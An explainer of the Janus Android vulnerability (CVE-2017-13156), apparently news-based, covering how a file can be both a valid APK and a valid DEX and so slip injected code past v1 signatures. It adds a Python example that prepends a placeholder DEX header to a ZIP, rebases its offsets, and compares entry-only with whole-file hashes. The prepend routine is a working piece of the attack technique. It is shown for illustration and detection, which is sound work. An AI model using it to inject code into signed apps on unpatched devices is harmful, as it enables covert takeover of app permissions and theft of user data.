A serious vulnerability has been found in Android that lets an attacker modify an application's code without invalidating the application's signature.
The root cause is that a single file can be a valid APK file and a valid DEX file at the same time. According to the bulletin, the flaw is called the "Janus vulnerability", after the two-faced Roman god of duality.
Android applications are self-signed, so the signature's real job is to protect updates: a new version is only accepted if it was signed with the same key as the installed one. Whether an update is safe to install is the first question a user should ask, but in practice few users think about it, or about the security of the update process at all. "When the user downloads an update of an application, the Android runtime compares its digital signature with the signature of the original version. If the signatures match, the Android runtime proceeds to install the update," GuardSquare researchers explained.
The updated application inherits every permission the user granted to the original. An attacker can therefore use the Janus vulnerability to subvert the update process: inject code into a trusted application, keep its permissions, and quietly eavesdrop on the unsuspecting user's device.
The vulnerability (CVE-2017-13156) can be used to take over an existing app's permissions, read valuable data such as passwords, contacts and messages, modify apps including system apps, or block an app's installation, all without any notice to the user.
The trick relies on both file formats tolerating extra bytes. An APK is a ZIP archive, and a ZIP archive can carry arbitrary bytes at the start, before its entries. The JAR signature scheme (APK signature scheme v1) hashes only the ZIP entries, so it ignores any such extra bytes when computing or verifying the application's signature.
Similarly, a DEX file can carry arbitrary bytes at the end, after its regular sections (strings, classes, method definitions and so on). A single file can therefore be a valid APK and a valid DEX file at the same time.
The Android runtime can load and execute both kinds of file. To decide which one it has been given, it looks only at the file header: if it finds a DEX header it loads the file as a DEX file, otherwise it treats the file as an APK and loads the DEX entries inside it. A dual DEX/APK file is therefore interpreted two ways: the signature check sees the APK, the runtime sees the DEX.
An attacker exploits this by prepending a malicious DEX file to an APK without affecting its signature. The system accepts the result as a valid update of the legitimate app, but the code that actually runs is the injected DEX.
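As an added illustration (not GuardSquare's proof of concept or any code from the bulletin), the following Python builds a constructed dual file by prepending a placeholder DEX header to a small ZIP and then applies the checks a verifier would want: does the file start with DEX magic, how many bytes sit before the first ZIP entry, and whether a hash over the entries only (the v1/JAR view) differs from a hash over the whole file (the v2 view). Names such as `build_apk`, `prepend_to_zip` and `leading_bytes` are the example's own, and the DEX header is a zero-filled placeholder with the right magic, not loadable code.

```python
"""Dual DEX/APK ("Janus") file: build a constructed sample and check it.

Added example, not GuardSquare's code. The DEX header is a placeholder
with valid magic and zeroed fields; it is not a loadable DEX.
"""
import hashlib
import io
import struct
import zipfile

DEX_MAGIC = b"dex\n035\x00"   # magic the runtime looks for at offset 0
DEX_HEADER_SIZE = 0x70        # size of a DEX header


def build_apk(entries):
    """Build a minimal APK-like ZIP from {name: bytes} (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def placeholder_dex():
    """DEX header with valid magic; everything else is zero (assumption: not loadable)."""
    hdr = bytearray(DEX_HEADER_SIZE)
    hdr[:8] = DEX_MAGIC
    struct.pack_into("<I", hdr, 0x20, DEX_HEADER_SIZE)  # file_size covers the DEX part only;
    struct.pack_into("<I", hdr, 0x24, DEX_HEADER_SIZE)  # header_size; trailing bytes are ignored
    struct.pack_into("<I", hdr, 0x28, 0x12345678)       # endian_tag
    return bytes(hdr)


def prepend_to_zip(prefix, zip_bytes):
    """Put `prefix` before a ZIP and rebase its offsets so it is still a valid archive.
    The ZIP entries themselves (what a v1/JAR signature covers) are untouched."""
    data = bytearray(prefix + zip_bytes)
    shift = len(prefix)
    eocd = data.rfind(b"PK\x05\x06")                           # end of central directory
    cd_size, cd_off = struct.unpack_from("<II", data, eocd + 12)
    struct.pack_into("<I", data, eocd + 16, cd_off + shift)    # rebase central dir offset
    pos, end = cd_off + shift, cd_off + shift + cd_size
    while pos < end:                                           # walk central directory headers
        assert data[pos:pos + 4] == b"PK\x01\x02"
        n, m, k = struct.unpack_from("<HHH", data, pos + 28)   # name/extra/comment lengths
        lho = struct.unpack_from("<I", data, pos + 42)[0]      # local header offset
        struct.pack_into("<I", data, pos + 42, lho + shift)
        pos += 46 + n + m + k
    return bytes(data)


def starts_with_dex_magic(b):
    """The runtime's decision: does the file begin with a DEX header?"""
    return b[:8] == DEX_MAGIC


def leading_bytes(b):
    """Bytes before the first ZIP entry. Anything > 0 lies outside the v1 signature."""
    eocd = b.rfind(b"PK\x05\x06")
    cd_size, cd_off = struct.unpack_from("<II", b, eocd + 12)
    actual_cd = eocd - cd_size
    delta = actual_cd - cd_off          # non-zero if a prefix was added without rebasing
    pos, first = actual_cd, None
    while pos < eocd:
        n, m, k = struct.unpack_from("<HHH", b, pos + 28)
        lho = struct.unpack_from("<I", b, pos + 42)[0] + delta
        first = lho if first is None else min(first, lho)
        pos += 46 + n + m + k
    return first


def read_entry(b, name):
    """Read one entry the way a ZIP reader (and the v1 verifier) sees it."""
    with zipfile.ZipFile(io.BytesIO(b)) as zf:
        return zf.read(name)


def entry_digest(b):
    """v1-style view: hash only the ZIP entries' names and contents."""
    h = hashlib.sha256()
    with zipfile.ZipFile(io.BytesIO(b)) as zf:
        for name in sorted(zf.namelist()):
            h.update(name.encode())
            h.update(zf.read(name))
    return h.hexdigest()


def whole_file_digest(b):
    """v2-style view: hash every byte of the file, prefix included."""
    return hashlib.sha256(b).hexdigest()


def analyze(b):
    return {"dex_magic": starts_with_dex_magic(b), "leading_bytes": leading_bytes(b),
            "entries": entry_digest(b), "whole": whole_file_digest(b)}


# Constructed sample: a two-entry "APK" and its Janus twin.
SAMPLE = build_apk({"AndroidManifest.xml": b"<manifest/>", "classes.dex": b"original dex"})
JANUS = prepend_to_zip(placeholder_dex(), SAMPLE)

if __name__ == "__main__":
    for label, blob in (("original", SAMPLE), ("janus", JANUS)):
        print(label, analyze(blob))
```

Run it directly and both rows print: the original shows `dex_magic` False and `leading_bytes` 0, the Janus file shows True and 112 while the entry digest is identical and only the whole-file digest changes. That identical entry digest is exactly the gap a signature over ZIP entries leaves and whole-file signing closes.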
The Janus vulnerability affects Android 5.0 "Lollipop" and newer; the fix shipped in the December 2017 Android security bulletin. Applications signed with APK signature scheme v2 and running on devices that verify it (Android 7.0 and newer) are protected, because v2 signs the whole file rather than only the ZIP entries. On older devices a v2-signed app falls back to v1 verification and remains exposed.
It is not known whether the vulnerability has been exploited in the wild. The researchers advise downloading applications and updates only from Google Play.